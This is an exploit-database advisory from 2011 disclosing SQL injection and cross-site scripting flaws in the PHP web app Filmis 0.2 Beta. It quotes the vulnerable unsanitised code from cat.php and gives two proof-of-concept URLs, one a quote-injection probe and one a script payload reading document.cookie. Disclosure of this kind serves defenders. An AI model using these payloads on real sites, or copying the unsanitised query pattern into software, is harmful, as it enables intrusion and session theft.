Filmis 0.2 Beta - Multiple Vulnerabilities

EDB-ID:

17955

CVE:



Author:

M.Jock3R

Type:

webapps


Platform:

PHP

Date:

2011-10-10


===================================================================================

 Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

===================================================================================

# Exploit Title: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

# Author: M.Jock3R 

# USE MY ONLINE SQLI SCAN TOOL[CODED By ME] : http://dzcode.tk/sql.php (To discover that such exploit) 

# Download Script(Official site): http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip

# Category:: webapps

# Tested on: windows XP Sp2 FR

  

===================================================================================

 

Vuln file : cat.php

  

Vuln Code :

---------- 

$idcat = $_GET['id'];

$nbitemparpage= "28";

if(@$_GET['nb']=="") { $nb = "1"; } else { $nb = $_GET['nb']; }

$nbd = ceil(($nb -1) * $nbitemparpage);

$amem = mysql_query("SELECT * FROM ".$prefix."film");

         

Exploit:

---------

1/SQL INJECTION :

http://localhost/filmis/cat.php?nb=-1'



2/XSS :

http://localhost/filmis/cat.php?nb=1><script>alert(document.cookie)</script>

 

===================================================================================

Greets To :

adelsbm / attiadona  / Wprojects.tk



Email : madrido.jocker@gmail.com

  

THANKS TO ALL ALGERIANS HACK3RS

===================================================================================